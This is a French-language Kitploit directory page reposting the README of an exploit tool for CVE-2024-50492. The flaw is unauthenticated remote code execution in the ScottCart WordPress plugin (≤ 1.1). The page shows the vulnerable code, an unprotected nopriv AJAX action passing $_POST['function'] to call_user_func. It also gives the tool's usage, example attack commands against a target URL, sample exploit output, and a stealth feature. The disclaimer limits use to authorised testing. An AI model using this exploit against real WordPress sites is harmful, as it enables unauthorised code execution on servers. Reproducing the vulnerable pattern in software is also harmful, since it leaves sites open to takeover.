Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-50492 — ScottCart <= 1.1 - Exécution de code à distance non authentifiée | Kitploit
Outils/GitHubGitHub/nxploited/cve-2024-50492
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubnxploited/cve-2024-50492

CVE-2024-50492

ScottCart <= 1.1 - Exécution de code à distance non authentifiée

Voir le dépôt
1il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

🚨 CVE-2024-50492 - ScottCart <= 1.1 Exploit RCE

🔥 Script d'exploit pour ScottCart <= 1.1 - Exécution de code à distance non authentifiée
🧑‍💻 Par Nxploit – Khaled Alenazi


📌 Description

Le plugin ScottCart pour WordPress (versions ≤ 1.1) est vulnérable à une exécution de code à distance (RCE).
Cela permet à des attaquants non authentifiés d'exécuter des fonctions PHP arbitraires sur le serveur via un point de terminaison AJAX vulnérable.

  • Plugin : ScottCart ≤ 1.1
  • Vulnérabilité : Injection de fonction non authentifiée → RCE
  • CVE : CVE-2024-50492
  • Score CVSS : 9.8 - Critique

🧠 Comment ça fonctionne

Le plugin enregistre une action AJAX non protégée :

root@kitploit:~
add_action('wp_ajax_nopriv_scottcart_load_function', 'scottcart_load_function_callback');

Qui exécute :

root@kitploit:~
call_user_func($_POST['function']);

Permettant aux attaquants d'appeler n'importe quelle fonction PHP existante, comme :

  • phpinfo()
  • scottcart_get_the_user_ip()
  • system() ← si étendue dans des environnements modifiés

🚀 Fonctionnalités de l'exploit

  • ✅ Envoie automatiquement une charge utile conçue pour déclencher le point de terminaison vulnérable
  • ✅ Permet de remplacer la fonction via un argument
  • ✅ Charge utile par défaut : phpinfo() pour la preuve de concept
  • ✅ Enregistre la sortie dans un fichier horodaté (ex. : results_2025-03-26_14-33-01.txt)
  • ✅ User-Agent personnalisé, gestion des erreurs et désactivation de SSL pour la discrétion

🖥️ Utilisation

root@kitploit:~
usage: CVE-2024-50492.py [-h] -u URL [-p PAYLOAD]

ScottCart <= 1.1 - Exécution de code à distance non authentifiée
Par Nxploit Khaled Alenazi.

options:
  -h, --help            Affiche ce message d'aide et quitte
  -u URL, --url URL     URL cible de base (ex. : http://192.168.100.74:888/wordpress)
  -p PAYLOAD, --payload PAYLOAD
                        Fonction à appeler (par défaut : phpinfo)

💡 Exemples

🔍 Comportement par défaut (PoC avec phpinfo()) :

root@kitploit:~
python3 CVE-2024-50492.py -u http://192.168.100.74:888/wordpress

🔎 Appel d'une fonction interne du plugin :

root@kitploit:~
python3 CVE-2024-50492.py -u http://192.168.100.74:888/wordpress -p scottcart_get_the_user_ip

🧾 Exemple de sortie

root@kitploit:~
[+] URL cible : http://192.168.100.74:888/wordpress
[+] Fonction de la charge utile : phpinfo
[*] Lancement de l'exploit...
[+] Envoi de la charge utile : function=phpinfo
[+] Exploit réussi ! Sortie :

PHP Version => 8.1.12
...

📁 Et sauvegardé dans : results_2025-03-26_14-33-01.txt


🛡️ Avertissement

Cet outil est destiné uniquement à des fins éducatives et de tests autorisés.
Ne l'utilisez pas contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation explicite.


💬 Crédits

  • 💻 Exploit par : Nxploit – Khaled Alenazi
  • 🛡️ ID CVE : CVE-2024-50492
Télécharger l’outil